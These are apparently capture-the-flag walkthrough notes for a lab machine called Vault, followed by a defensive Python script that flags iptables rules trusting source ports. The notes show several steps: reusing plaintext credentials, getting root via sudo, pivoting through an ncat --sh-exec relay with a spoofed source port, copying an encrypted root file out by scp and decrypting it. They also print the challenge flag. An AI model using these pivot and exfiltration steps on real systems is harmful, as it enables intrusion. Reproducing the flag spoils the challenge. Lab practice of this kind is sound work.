- ACCESS WEBSITE FROM SERVER
- ssh -D 8080 dave@10.10.10.109
- ==============================================================================================================
- REWORK THIS AREA
- ==============================================================================================================
- MORE CREDENTIALS FOUND
- root@DNS:/var/www/DNS/desktop# cat ssh
- dave
- dav3gerous567
- SSH INTO DNS SERVER
- ssh dave@192.168.122.4
- dav3gerous567
- READ ALEX'S .BASH_HISTORY AND LOOKED AT THE VISUDO FILE, WHICH LETS ADMINS SUDO AS ROOT
- BECOME ROOT
- sudo su -
- dav3gerous567
- TRACEROUTE (using port 1723/tcp)
- HOP RTT ADDRESS
- 1 0.82 ms 192.168.5.1
- Nmap scan report for Vault (192.168.5.2)
- Host is up (0.0021s latency).
- Not shown: 998 filtered ports
- PORT STATE SERVICE VERSION
- 53/tcp closed domain
- 4444/tcp closed krb524
- Too many fingerprints match this host to give specific OS details
- Network Distance: 2 hops
- TRACEROUTE (using port 53/tcp)
- HOP RTT ADDRESS
- 1 0.98 ms 192.168.122.5
- 2 1.86 ms Vault (192.168.5.2)
- HOW TO +++++====================================================================================================
- SEE WHAT PORTS ARE OPEN ON VAULT
- cat /var/log/auth.log | grep -a 192.168.5.2
- (port 4444 is used for ssh)
- SET UP A LISTENER
- ncat -l 5555 --sh-exec "ncat 192.168.5.2 987 --source-port=4444" &
- ENSURE PORT IS OPEN
- /usr/bin/nmap 192.168.5.2 -Pn --source-port=4444 -f
- SSH IN
- ssh dave@localhost -p 5555
- IS PORT BEING USED BY SOMEONE ELSE
- ps aux | grep ncat
- dave@vault:~$ ls
- root.txt.gpg
- SCP IT BACK TO UBUNTU MACHINE ENSURE NCAT IS WORKING
- root@DNS:~# ncat -l 5555 --sh-exec "ncat 192.168.5.2 987 --source-port=4444" &
- [1] 14627
- COPY FILE FROM VAULT TO DNS USING SCP FROM DNS
- root@DNS:~# scp -P 5555 dave@localhost:/home/dave/root.txt.gpg /tmp
- dave@localhost's password:
- root.txt.gpg 100% 629 0.6KB/s 00:00
- [1]+ Done ncat -l 5555 --sh-exec "ncat 192.168.5.2 987 --source-port=4444"
- root@DNS:~# cd /tmp
- root@DNS:/tmp# ls
- root.txt.gpg test.txt
- COPY FILE FROM DNS TO UBUNTU FROM THE UBUNTU MACHINE
- dave@ubuntu:~$ scp dave@192.168.122.4:/tmp/root.txt.gpg /dev/shm/
- dave@192.168.122.4's password:
- root.txt.gpg 100% 629 0.6KB/s 00:00
- dave@ubuntu:~$ cd /dev/shm
- DECRYPT THE GPG ROOT FILE USING THE KEY FOUND IN DAVE'S DESKTOP FOLDER
- dave@ubuntu:/dev/shm$ gpg -d root.txt.gpg
- You need a passphrase to unlock the secret key for
- user: "david <dave@david.com>"
- 4096-bit RSA key, ID D1EB1F03, created 2018-07-24 (main key ID 0FDFBFE4)
- gpg: encrypted with 4096-bit RSA key, ID D1EB1F03, created 2018-07-24
- "david <dave@david.com>"
- itscominghome
- ROOT FILE
- ca468370b91d1f5906e31093d9bfe819
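
The HOW TO steps above only reach Vault when the connection leaves from source port 4444 (the nmap run with `--source-port=4444` and the ncat relay), which points to a filter that accepts traffic based on its source port. As an added example, not part of the original notes, this Python audit flags such rules in `iptables-save` output. That the filter is iptables is an assumption, the sample ruleset is constructed for illustration, and `audit_source_port_trust` is a hypothetical helper name.

```python
import shlex

# Constructed iptables-save excerpt for illustration (not taken from the Vault host).
SAMPLE_RULES = """\
*filter
:INPUT DROP [0:0]
-A INPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
-A INPUT -p tcp -m tcp --sport 4444 -j ACCEPT
-A INPUT -p tcp -m tcp --sport 53 -j ACCEPT
-A INPUT -p udp -m udp --sport 53 -m conntrack --ctstate ESTABLISHED -j ACCEPT
-A INPUT -s 192.168.122.0/24 -p tcp -m tcp --dport 987 -j ACCEPT
COMMIT
"""

SPORT_FLAGS = {"--sport", "--source-port", "--sports"}
STATE_FLAGS = {"--ctstate", "--state"}


def audit_source_port_trust(ruleset: str):
    """Return (line_no, ports, rule) for ACCEPT rules that trust a source port statelessly."""
    findings = []
    for line_no, line in enumerate(ruleset.splitlines(), start=1):
        if not line.startswith("-A "):
            continue  # skip table headers, chain policies and COMMIT
        tokens = shlex.split(line)
        opts = {}
        for i, tok in enumerate(tokens[:-1]):
            if i and tokens[i - 1] == "!":
                continue  # negated match: it does not grant trust to that value
            if tok.startswith("--") or tok == "-j":
                opts[tok] = tokens[i + 1]
        if opts.get("-j") != "ACCEPT":
            continue
        sport = next((opts[f] for f in SPORT_FLAGS if f in opts), None)
        if sport is None:
            continue
        states = set()
        for f in STATE_FLAGS:
            states.update(opts.get(f, "").split(","))
        states.discard("")
        # A rule limited to ESTABLISHED/RELATED only passes replies to connections
        # the host itself opened; anything else lets the remote side pick the port.
        if states and states <= {"ESTABLISHED", "RELATED"}:
            continue
        findings.append((line_no, sport, line))
    return findings
```

Each finding is a rule to replace with a match on destination port plus connection state, since the source port of an inbound connection is chosen by the client.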